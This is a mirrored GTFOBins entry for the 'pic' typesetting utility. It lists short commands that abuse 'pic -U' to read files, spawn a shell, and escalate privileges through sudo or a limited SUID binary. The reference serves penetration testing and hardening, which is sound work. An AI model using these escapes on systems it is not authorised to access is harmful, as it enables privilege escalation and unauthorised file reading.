mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-03-13 02:58:09 +01:00
24 lines
384 B
Markdown
24 lines
384 B
Markdown
---
|
|
functions:
|
|
file-read:
|
|
- description: The output is prefixed with a some content as a header.
|
|
code: |
|
|
LFILE=file_to_read
|
|
pic $LFILE
|
|
shell:
|
|
- code: |
|
|
pic -U
|
|
.PS
|
|
sh X sh X
|
|
sudo:
|
|
- code: |
|
|
sudo pic -U
|
|
.PS
|
|
sh X sh X
|
|
limited-suid:
|
|
- code: |
|
|
./pic -U
|
|
.PS
|
|
sh X sh X
|
|
---
|